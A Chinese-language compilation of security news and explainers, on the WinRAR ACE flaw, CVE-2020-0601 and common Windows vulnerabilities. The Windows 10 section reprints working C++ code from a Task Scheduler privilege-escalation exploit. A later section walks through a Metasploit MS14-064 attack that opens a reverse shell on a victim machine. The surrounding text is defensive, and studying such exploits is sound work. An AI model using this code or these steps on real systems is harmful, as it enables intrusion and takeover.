日,國外安全研究人員披露,著名壓縮軟件WinRAR被曝高危漏洞,目前全球已有超過5億用戶受到影響。
據(jù)報道,在WinRAR 的UNACEV2.dll 代碼庫中發(fā)現(xiàn)嚴(yán)重安全漏洞,眾多壓縮工具支持.ace格式文件的解壓縮,存在漏洞的ACE解壓模塊文件unacev2.dll創(chuàng)建于2005年,已經(jīng)14年未更新。
黑客可利用該漏洞繞過權(quán)限提升直接運行WinRAR,并將惡意文件放進Windows系統(tǒng)的啟動文件夾中,只要用戶重新開機惡意文件即自動運行,黑客便能“完全控制”受害者計算機。
騰訊電腦管家剛剛也發(fā)布預(yù)警,安全專家驗證,該漏洞不僅僅存在于WinRAR 5.7之前的版本,網(wǎng)民日常使用的Bandizip、2345壓縮、好壓、totalcmd等軟件均存在該風(fēng)險。
騰訊電腦管家建議用戶升級壓縮軟件到最新版本,或者刪除壓縮解壓軟件安裝目錄下的unacev2.dll文件。
只需要在壓縮工具快捷方式的圖標(biāo)上點擊鼠標(biāo)右鍵,在彈出的菜單中選擇“打開文件位置”即可跳轉(zhuǎn)到壓縮工具目錄,將當(dāng)前目錄下的unacev2.dll文件手動刪除即可。
以WinRAR為例操作:
1、手動找到WinRAR的安裝文件夾
2、在WinRAR的文件夾中刪除unacev2.dll
日,微軟發(fā)布CVE-2020-0601漏洞公告,修補了Windows加密庫中的CryptoAPI欺騙漏洞。該漏洞可被利用對惡意程序簽名,從而騙過操作系統(tǒng)或安全軟件的安全機制,使Windows終端面臨被攻擊的巨大風(fēng)險,主要影響Windows 10以及Windows Server 2016和2019,Win10以下版本不受影響。
經(jīng)騰訊安全技術(shù)專家檢測發(fā)現(xiàn),該漏洞的POC和在野利用已先后出現(xiàn),影響范圍包括HTTPS連接,文件簽名和電子郵件簽名,以用戶模式啟動的簽名可執(zhí)行程序等。目前,騰訊電腦管家、T-Sec 終端安全管理系統(tǒng)均可修復(fù)該漏洞,騰訊安全也已率先發(fā)布漏洞利用惡意程序?qū)⒐ぞ撸煽焖贆z測可疑程序是否利用CVE-2020-0601漏洞偽造證書,用戶可運行此工具掃描本地硬盤或特定目錄,將危險程序清除。
騰訊安全團隊對該漏洞利用的POC進行深入分析后,確認該POC為CVE-2020-0601漏洞利用的一個典型偽造簽名場景,即通過該POC可輕松偽造出正常公鑰對應(yīng)的第二可用私鑰,相當(dāng)于黑客可以用自己的私鑰欺騙微軟系統(tǒng),隨便制造一個簽名,系統(tǒng)都以為是合法的;而在無漏洞的情況下達到該效果需要消耗極大算力。
與此同時,騰訊安全團隊還檢測到已有國內(nèi)黑產(chǎn)組織利用該漏洞構(gòu)造多個惡意程序,說明該漏洞的利用方法已被部分病毒木馬黑產(chǎn)所掌握。雖然該漏洞不能直接導(dǎo)致蠕蟲式的利用,但可以在多種欺騙場景中運用。
在野利用樣本1:ghost變種遠程控制木馬。該樣本利用漏洞構(gòu)造了看似正常的數(shù)字簽名,極具迷惑性。用戶一旦中招,電腦將會被黑客遠程控制。攻擊者可以進行提權(quán)、添加用戶、獲取系統(tǒng)信息、注冊表管理、文件管理、鍵盤記錄、竊聽音頻等操作,還可以控制肉雞電腦進行DDoS攻擊。
利用該漏洞構(gòu)造的惡意程序一
在野漏洞利用樣本2:horsedeal勒索病毒。該樣本具有看似正常的數(shù)字簽名,攻擊者誘使受害者運行該惡意程序后,會導(dǎo)致受害者硬盤數(shù)據(jù)被加密。
利用該漏洞構(gòu)造的惡意程序二
在野利用場景3:利用漏洞騙取瀏覽器對擁有偽造證書的網(wǎng)站的信任,如通過偽造類相似域名進行釣魚攻擊,在瀏覽器識別為“可信”網(wǎng)站下注入惡意腳本。
該惡意網(wǎng)頁可顯示正常的證書信息
此外,騰訊安全研究人員指出,在任意受影響的機器中,任意PE文件只要用這個偽造的證書進行簽名,都能通過windows的證書檢驗。現(xiàn)有安全體系很大程度依賴證書簽名,如果通過漏洞偽造簽名欺騙系統(tǒng),成功繞過安全防御及查殺機制,攻擊者便可為所欲為,造成嚴(yán)重后果。
漏洞可以給任意PE文件偽造簽名欺騙系統(tǒng)
僅在微軟發(fā)布安全公告后不到一天的時間里,已經(jīng)發(fā)現(xiàn)漏洞利用代碼公開,及眾多在野利用樣本。通過對攻擊樣本進行深入分析,騰訊安全技術(shù)專家認為,該漏洞的相關(guān)代碼已通過網(wǎng)絡(luò)擴散,被黑灰產(chǎn)業(yè)利用的可能性正在增加。如2017年4月,黑客攻擊NSA,釋放出NSA核武級漏洞攻擊包就是永恒之藍系列工具包,該工具包至今仍是網(wǎng)絡(luò)黑產(chǎn)最常使用的絕佳攻擊武器。
值得一提的是,該漏洞主要影響Windows 10以及Windows Server 2016和2019。而Windows 8.1和更低版本以及Server 2012 R2和更低版本不支持帶有參數(shù)的ECC密鑰,因此,較早的Windows版本會直接不信任嘗試?yán)么寺┒吹拇祟愖C書,不受該漏洞影響。
鑒于該漏洞具有極高的利用價值,而且在很短時間內(nèi)漏洞利用方法已被黑產(chǎn)所掌握,騰訊安全專家建議廣大企業(yè)網(wǎng)絡(luò)管理員,可參考以下方法運行專殺工具清除危險程序。
使用方式:
1,手動掃描(個人模式):
a,根據(jù)提示輸入需要掃描的目錄,然后按Enter鍵,如果是全盤掃描,則輸入root后按Enter鍵
b,發(fā)現(xiàn)病毒的情況下,輸入Y,然后按Enter鍵,則開始刪除。該操作請謹(jǐn)慎,刪除后無法還原
2,命令行模式(企業(yè)模式):
a,將exe以命令行啟動,比如掃描C盤test目錄(##dir=C:\test;autodel=N),如果要全盤掃描(##dir=root;autodel="N")
b, 如果要自動刪除則設(shè)置autodel="Y"
產(chǎn)品截圖:如下
http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/cve_2020_0601_scan.exe
同時,騰訊安全建議企業(yè)用戶立即升級補丁盡快修復(fù)該漏洞,或使用T-Sec 終端安全管理系統(tǒng)(騰訊御點)統(tǒng)一檢測修復(fù)所有終端系統(tǒng)存在的安全漏洞。同時,企業(yè)用戶還可使用T-Sec 高級威脅檢測系統(tǒng)(騰訊御界),檢測利用CVE-2020-0601漏洞的攻擊活動,全方位保障企業(yè)自身的網(wǎng)絡(luò)安全。
T-Sec 高級威脅檢測系統(tǒng)沙箱檢測到危險程序
對于普通個人用戶來說,騰訊安全推薦使用騰訊電腦管家的漏洞修復(fù)功能,或Windows Update安裝補丁,攔截危險程序,全面保護系統(tǒng)安全。
騰訊電腦管家發(fā)現(xiàn)漏洞風(fēng)險
責(zé)編:李文瑤
們電腦的windows系統(tǒng),默認都會開啟系統(tǒng)更新,經(jīng)常告訴我們要更新修復(fù)系統(tǒng)漏洞,還有我們也會自己安裝一些電腦維護軟件,比如安全衛(wèi)士或電腦管家,有時系統(tǒng)啟動后經(jīng)常會彈出窗口提示檢測到存在高危漏洞,那么什么是系統(tǒng)漏洞呢?Windows系統(tǒng)漏洞對電腦會造成什么危害?常見的漏洞有哪些? 攻擊者是如何利用這些漏洞的?
Windows系統(tǒng)漏洞是指操作系統(tǒng)在開發(fā)過程中存在的技術(shù)缺陷或程序錯誤,這些缺陷可能導(dǎo)致其他用戶(比如黑客)非法訪問或利用病毒攻擊計算機系統(tǒng),從而竊取電腦重要資料和信息,甚至破壞操作系統(tǒng)。因此,系統(tǒng)開發(fā)商(比如微軟公司)一般每月都會發(fā)布最新的補丁程序用以修復(fù)新發(fā)現(xiàn)的漏洞。
1、系統(tǒng)漏洞經(jīng)常被不法者或黑客用于向電腦強制安裝惡意程序、傳播病毒以及植入木馬等;
2、系統(tǒng)漏洞容易導(dǎo)致電腦重要的數(shù)據(jù)和信息被竊取,嚴(yán)重者會導(dǎo)致操作系統(tǒng)被破壞,電腦數(shù)據(jù)全部丟失;
3、在局域網(wǎng)環(huán)境中,還會造成病毒的傳播,導(dǎo)致其他電腦癱瘓,危害極大;
4、被嚴(yán)重破壞的操作系統(tǒng)只能通過重裝系統(tǒng)來解決,u盤重裝ghost win7教程圖解。
系統(tǒng)漏洞主要分為兩種,一種是高危漏洞,另一種是功能性漏洞:
1、高危漏洞:系統(tǒng)核心和Office 漏洞,這些漏洞允許遠程執(zhí)行代碼,使得電腦有被入侵的危險
2、功能性漏洞:軟件版本更新或給系統(tǒng)添加實用功能,用于解決普通的電腦問題,提升電腦性能
1.Windows XP系統(tǒng)常見漏洞
Windows XP系統(tǒng)常見的漏洞有UPNP服務(wù)漏洞、升級程序漏洞、幫助和支持中心漏洞、壓縮文件夾漏洞、服務(wù)拒絕漏洞、Windows Media Player漏洞、RDP漏洞、VM漏洞、熱鍵漏洞、賬號快速切換漏洞等。
(1)UPNP服務(wù)漏洞
漏洞描述:允許攻擊者執(zhí)行任意指令。
Windows XP默認啟動的UPNP服務(wù)存在嚴(yán)重安全漏洞。UPNP(Universal Plug and Play)體系面向無線設(shè)備、PC和智能應(yīng)用,提供普遍的對等網(wǎng)絡(luò)連接,在家用信息設(shè)備、辦公用網(wǎng)絡(luò)設(shè)備間提供TCP/IP連接和Web訪問功能,該服務(wù) 可用于檢測和集成UPNP硬件。
UPNP協(xié)議存在安全漏洞,使攻擊者可非法獲取任何Windows XP的系統(tǒng)級訪問,進行攻擊,還可通過控制多臺XP機器發(fā)起分布式的攻擊。
防御策略:禁用UPNP服務(wù)后下載并安裝對應(yīng)的補丁程序。
(2)升級程序漏洞
漏洞描述:如將Windows XP升級至Windows XP Pro,IE會重新安裝,以前打的補丁程序?qū)⒈蝗壳宄?/p>
Windows XP的升級程序不僅會刪除IE的補丁文件,還會導(dǎo)致微軟的升級服務(wù)器無法正確識別IE是否存在缺陷,即Windows XP Pro系統(tǒng)存在如下2個潛在威脅。
·某些網(wǎng)頁或HTML郵件的腳本可自動調(diào)用Windows的程序。
·可通過IE漏洞窺視用戶的計算機文件。
防御策略:如IE瀏覽器未下載升級補丁可至微軟網(wǎng)站下載最新補丁程序。
(3)幫助和支持中心漏洞
漏洞描述:刪除用戶系統(tǒng)的文件。
幫助和支持中心提供集成工具,用戶可獲取針對各種主題的幫助和支持。在Windows XP幫助和支持中心存在漏洞,可使攻擊者跳過特殊網(wǎng)頁(在打開該網(wǎng)頁時調(diào)用錯誤的函數(shù),并將存在的文件或文件夾名字作為參數(shù)傳送)使上傳文件或文件夾的操 作失敗,隨后該網(wǎng)頁可在網(wǎng)站上公布,以攻擊訪問該網(wǎng)站的用戶或被作為郵件傳播來攻擊。該漏洞除使攻擊者可刪除文件外不會賦予其他權(quán)利,攻擊者既無法獲取系 統(tǒng)管理員的權(quán)限,也無法讀取或修改文件。
防御策略:安裝Windows XP的Service Pack 3。
(4)壓縮文件夾漏洞
漏洞描述:Windows XP壓縮文件夾可按攻擊者的選擇運行代碼。
在安裝有"Plus"包的Windows XP系統(tǒng)中,"壓縮文件夾"功能允許將Zip文件作為普通文件夾處理。"壓縮文件夾"功能存在2個漏洞,如下所述。
·在解壓縮Zip文件時會有未經(jīng)檢查的緩沖存在于程序中,以存放被解壓文件,因此很可能導(dǎo)致瀏覽器崩潰或攻擊者的代碼被運行。
·解壓縮功能在非用戶指定目錄中放置文件,可使攻擊者在用戶系統(tǒng)的已知位置中放置文件。
防御策略:不接收不信任的郵件附件,也不下載不信任的文件。
(5)服務(wù)拒絕漏洞
漏洞描述:服務(wù)拒絕。
Windows XP支持點對點的協(xié)議(PPTP)作為遠程訪問服務(wù)實現(xiàn)的虛擬專用網(wǎng)技術(shù)。由于在其控制用于建立、維護和拆開PPTP連接的代碼段中存在未經(jīng)檢查的緩存, 導(dǎo)致Windows XP的實現(xiàn)中存在漏洞。通過向一臺存在該漏洞的服務(wù)器發(fā)送不正確的PPTP控制數(shù)據(jù),攻擊者可損壞核心內(nèi)存并導(dǎo)致系統(tǒng)失效,中斷所有系統(tǒng)中正在運行的進 程。該漏洞可攻擊任何一臺提供PPTP服務(wù)的服務(wù)器。對于PPTP客戶端的工作站,攻擊者只需激活PPTP會話即可進行攻擊。對任何遭到攻擊的系統(tǒng),可通 過重啟來恢復(fù)正常操作。
防御策略:關(guān)閉PPTP服務(wù)。
(6)Windows Media Player漏洞
漏洞描述:可能導(dǎo)致用戶信息的泄漏,腳本調(diào)用,緩存路徑泄漏。
Windows Media Player漏洞主要產(chǎn)生2個問題:一是信息泄漏漏洞,它給攻擊者提供了一種可在用戶系統(tǒng)上運行代碼的方法,微軟對其定義的嚴(yán)重級別為"嚴(yán)重";二是腳本 執(zhí)行漏洞,當(dāng)用戶選擇播放一個特殊的媒體文件,接著又瀏覽一個特殊建造的網(wǎng)頁后,攻擊者就可利用該漏洞運行腳本。由于該漏洞有特別的時序要求,因此利用該 漏洞進行攻擊相對就比較困難,它的嚴(yán)重級別也就比較低。
防御策略:將要播放的文件先下載到本地再播放,即可不受利用此漏洞進行的攻擊。
(7)RDP漏洞
漏洞描述:信息泄露并拒絕服務(wù)。
Windows操作系統(tǒng)通過RDP(Remote Data Protocol)為客戶端提供遠程終端會話。RDP協(xié)議將終端會話的相關(guān)硬件信息傳送至遠程客戶端,其漏洞如下所述。
·與某些RDP版本的會話加密實現(xiàn)有關(guān)的漏洞。所有RDP實現(xiàn)均允許對RDP會話中的數(shù)據(jù)進行加密,在 Windows 2000和Windows XP版本中,純文本會話數(shù)據(jù)的校驗在發(fā)送前并未經(jīng)過加密,竊聽并記錄RDP會話的攻擊者,可對該校驗密碼分析攻擊并覆蓋該會話傳輸。
·與Windows XP中的RDP實現(xiàn)對某些不正確的數(shù)據(jù)包處理方法有關(guān)的漏洞。當(dāng)接收這些數(shù)據(jù)包時,遠程桌面服務(wù)將會失效,同時也會導(dǎo)致操作系統(tǒng)失效。攻擊者向一個已受影響的系統(tǒng)發(fā)送這類數(shù)據(jù)包時,并不需經(jīng)過系統(tǒng)驗證。
防御策略:Windows XP默認并未啟動它的遠程桌面服務(wù)。即使遠程桌面服務(wù)啟動,只需在防火墻中屏蔽3389端口,即可避免該攻擊。
(8)VM漏洞
漏洞描述:可能造成信息泄露,并執(zhí)行攻擊者的代碼。
攻擊者可通過向JDBC類傳送無效的參數(shù)使宿主應(yīng)用程序崩潰,攻擊者需在網(wǎng)站上擁有惡意的Java applet并引誘用戶訪問該站點。惡意用戶可在用戶機器上安裝任意DLL,并執(zhí)行任意的本機代碼,潛在地破壞或讀取內(nèi)存數(shù)據(jù)。
防御策略:經(jīng)常進行相關(guān)軟件的安全更新。
(9)熱鍵漏洞
漏洞描述:設(shè)置熱鍵后,由于Windows XP的自注銷功能,可使系統(tǒng)"假注銷",其他用戶即可通過熱鍵調(diào)用程序。
熱鍵功能是系統(tǒng)提供的服務(wù),當(dāng)用戶離開計算機后,該計算機即處于未保護情況下,此時Windows XP會自動實施"自注銷",雖然無法進入桌面,但由于熱鍵服務(wù)還未停止,仍可使用熱鍵啟動應(yīng)用程序。
防御策略:
①由于該漏洞被利用的前提為熱鍵可用,因此需檢查可能會帶來危害的程序和服務(wù)的熱鍵。
②啟動屏幕保護程序,并設(shè)置密碼。
③在離開計算機時鎖定計算機。
(10)賬號快速切換漏洞
漏洞描述:Windows XP快速賬號切換功能存在問題,可造成賬號鎖定,使所有非管理員賬號均無法登錄。
Windows XP系統(tǒng)設(shè)計了賬號快速切換功能,使用戶可快速地在不同的賬號間切換,但其設(shè)計存在問題,可被用于造成賬號鎖定,使所有非管理員賬號均無法登錄。配合賬號 鎖定功能,用戶可利用賬號快速切換功能,快速重試登錄另一個用戶名,系統(tǒng)則會判別為暴力破解,從而導(dǎo)致非管理員賬號鎖定。
2.Windows 7系統(tǒng)常見漏洞
與Windows XP相比,Windows 7系統(tǒng)中的漏洞就少了很多。Windows 7系統(tǒng)中常見的漏洞有快捷方式漏洞與SMB協(xié)議漏洞2種。
(1)快捷方式漏洞
漏洞描述:快捷方式漏洞是Windows Shell框架中存在的一個危急安全漏洞。在Shell32.dll的解析過程中,會通過"快捷方式"的文件格式去逐個解析:首先找到快捷方式所指向的文 件路徑,接著找到快捷方式依賴的圖標(biāo)資源。這樣,Windows桌面和開始菜單上就可以看到各種漂亮的圖標(biāo),我們點擊這些快捷方式時,就會執(zhí)行相應(yīng)的應(yīng)用 程序。
微軟Lnk漏洞就是利用了系統(tǒng)解析的機制,攻擊者惡意構(gòu)造一個特殊的Lnk(快捷方式)文件,精心構(gòu)造一串程序 代碼來騙過操作系統(tǒng)。當(dāng)Shell32.dll解析到這串編碼的時候,會認為這個"快捷方式"依賴一個系統(tǒng)控件(dll文件),于是將這個"系統(tǒng)控件"加 載到內(nèi)存中執(zhí)行。如果這個"系統(tǒng)控件"是病毒,那么Windows在解析這個lnk(快捷方式)文件時,就把病毒激活了。該病毒很可能通過USB存儲器進 行傳播。
防御策略:禁用USB存儲器的自動運行功能,并且手動檢查USB存儲器的根文件夾。
(2)SMB協(xié)議漏洞
SMB協(xié)議主要是作為Microsoft網(wǎng)絡(luò)的通信協(xié)議,用于在計算機間共享文件、打印機、串口等。當(dāng)用戶執(zhí)行 SMB2協(xié)議時系統(tǒng)將會受到網(wǎng)絡(luò)攻擊從而導(dǎo)致系統(tǒng)崩潰或重啟。因此,只要故意發(fā)送一個錯誤的網(wǎng)絡(luò)協(xié)議請求,Windows 7系統(tǒng)就會出現(xiàn)頁面錯誤,從而導(dǎo)致藍屏或死機。
防御策略:關(guān)閉SMB服務(wù)。
3、Windows 10常見漏洞
本地提權(quán)漏洞:
漏洞背景
win10中任務(wù)調(diào)度服務(wù)導(dǎo)出的函數(shù)沒有驗證調(diào)用者的權(quán)限,任意權(quán)限的用戶調(diào)用該函數(shù)可以獲取系統(tǒng)敏感文件的寫權(quán)限,進而提權(quán)。
漏洞影響
漏洞影響win10和windows server 2016。目前發(fā)布的EXP暫時只能用于x64系統(tǒng)。
漏洞詳情
win10系統(tǒng)Task Scheduler任務(wù)調(diào)度服務(wù)中ALPC調(diào)用接口導(dǎo)出了SchRpcSetSecurity函數(shù),該函數(shù)能夠?qū)σ粋€任務(wù)或者文件夾設(shè)置安全描述符。
HRESULT SchRpcSetSecurity( [in, string] const wchar_t* path, [in,string] const wchar_t* sddl, [in] DWORD flags );
該服務(wù)是通過svchost的服務(wù)組netsvcs所啟動的,對應(yīng)的dll是schedsvc.dll。
在xp系統(tǒng)中,任務(wù)存放在C:\Windows\Tasks目錄,后綴為.job;而win7及以后的版本任務(wù)以xml的格式存放在C:\Windows\System32\Tasks目錄。
可能是為了兼容的考慮,SchRpcSetSecurity函數(shù)在win10中仍然會檢測C:\Windows\Tasks目錄下是否存在后綴為.job的文件,如果存在則會寫入DACL數(shù)據(jù)。如果將job文件硬鏈接到特定的dll那么特定的dll就會被寫入DACL數(shù)據(jù),本來普通用戶對特定的dll只具有讀權(quán)限,這樣就具有了寫權(quán)限,接下來向dll寫入漏洞利用代碼并啟動相應(yīng)的程序就獲得了提權(quán)。
那么首先需要找到一個普通用戶具有讀權(quán)限而系統(tǒng)具有寫入DACL權(quán)限的dll,EXP中用的是C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_4592475aca2acf83\Amd64\printconfig.dll,然后將C:\Windows\Tasks\UpdateTask.job硬鏈接到這個dll。
WIN32_FIND_DATA FindFileData; HANDLE hFind; hFind=FindFirstFile(L"C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64*", &FindFileData); wchar_t BeginPath[MAX_PATH]=L"c:\windows\system32\DriverStore\FileRepository\"; wchar_tPrinterDriverFolder[MAX_PATH]; wchar_t EndPath[23]=L"\Amd64\PrintConfig.dll"; wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName)); FindClose(hFind); wcscat(BeginPath, PrinterDriverFolder); wcscat(BeginPath, EndPath); //Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of CreateNativeHardlink(L"c:\windows\tasks\UpdateTask.job", BeginPath);
在調(diào)用SchRpcSetSecurity函數(shù)使普通用戶成功獲取了對該dll寫入的權(quán)限之后寫入資源文件中的exploit.dll。
//Must be name of final DLL.. might be better ways to grab the handle HMODULE mod=GetModuleHandle(L"ALPC-TaskSched-LPE"); //Payload is included as a resource, you need to modify this resource accordingly. HRSRC myResource=::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); unsigned int myResourceSize=::SizeofResource(mod, myResource); HGLOBAL myResourceData=::LoadResource(mod, myResource); void* pMyBinaryData=::LockResource(myResourceData); //We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue HANDLE hFile; DWORD dwBytesWritten=0; do { hFile=CreateFile(BeginPath,GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); WriteFile(hFile,(char*)pMyBinaryData,myResourceSize,&dwBytesWritten,NULL); if (hFile==INVALID_HANDLE_VALUE) { Sleep(5000); } } while (hFile==INVALID_HANDLE_VALUE); CloseHandle(hFile);
printconfig.dll和系統(tǒng)打印相關(guān),并且沒有被print spooler服務(wù)默認啟動。所以隨后調(diào)用StartXpsPrintJob開始一個XPS打印。
//After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service. CoInitialize(nullptr); IXpsOMObjectFactory *xpsFactory=NULL; CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast
(&xpsFactory));
HANDLE completionEvent=CreateEvent(
NULL, TRUE, FALSE,
NULL);
IXpsPrintJob *job=
NULL;
IXpsPrintJobStream *jobStream=
NULL;
StartXpsPrintJob(
L"Microsoft XPS Document Writer",
L"Print Job 1",
NULL,
NULL, completionEvent,
NULL,
0, &job, &jobStream,
NULL);
jobStream->Close();
CoUninitialize();
return
0;
整個漏洞利用程序編譯出來是個dll,把它注入到notepad中運行,發(fā)現(xiàn)spoolsv.exe創(chuàng)建的notepad已經(jīng)具有SYSTEM權(quán)限,而系統(tǒng)中的printconfig.dll也被修改成了資源文件中的exploit.dll。
防御措施
建議用戶安裝360安全衛(wèi)士等終端防御軟件攔截利用此類漏洞的攻擊,不要打開來源不明的程序。
四、以實例講解攻擊者是如何利用系統(tǒng)漏洞發(fā)起攻擊的
利用MS14-064 漏洞測試入侵win7
Microsoft Windows OLE遠程代碼執(zhí)行漏洞,OLE(對象鏈接與嵌入)是一種允許應(yīng)用程序共享數(shù)據(jù)和功能的技術(shù),
遠程攻擊者利用此漏洞通過構(gòu)造的網(wǎng)站執(zhí)行任意代碼,影響Win95+IE3 – Win10+IE11全版本...
里已經(jīng)加入了此漏洞的利用模塊 :exploit/windows/browser/ms14_064_ole_code_execution
執(zhí)行命令:
msfconsole //啟動MSF
search ms14 //搜索關(guān)鍵字
use exploit/windows/browser/ms14_064_ole_code_execution // 加載漏洞利用模塊
set payload windows/meterpreter/reverse_tcp //設(shè)置反彈連接shell
如圖:
需要注意的是箭頭標(biāo)記的屬性默認為false 需要設(shè)置為true ,因為msf中自帶的漏洞利用exp調(diào)用的是 powershell,
所以msf(Metasploit Framework)中的exp代碼只對安裝powershell的系統(tǒng)生效。安裝自帶powershell,
所以我們這里測試受害的機器為windows7 32位.
按照圖中各個屬性配置好后 執(zhí)行exploit即可
得到一個URL地址,復(fù)制到受害者機器(win7)測試
當(dāng)用戶點擊允許了后
可以看見這邊反彈了一個shell,接下里我們就可以隨便搞了,
攻擊成功,結(jié)束!!!
五、漏洞攻擊如何防護
1、及時修復(fù)系統(tǒng)環(huán)境中存在的安全漏洞
防范漏洞攻擊最直接有效的方法就是修復(fù)系統(tǒng)環(huán)境中存在的安全漏洞。
2、 保持騰訊電腦管家、360安全衛(wèi)士等安全軟件的正常開啟
正常開啟騰訊電腦管家或者360安全衛(wèi)士等安全軟件,可以有效攔截利用漏洞觸發(fā)傳播的病毒,有效彌補漏洞修復(fù)的不足。
3、 培養(yǎng)良好的計算機使用習(xí)慣
a) 提高計算機網(wǎng)絡(luò)安全意識
b) 不要輕易下載不明軟件程序
c) 不要輕易打開不明郵件夾帶的可疑附件
d) 及時備份重要的數(shù)據(jù)文件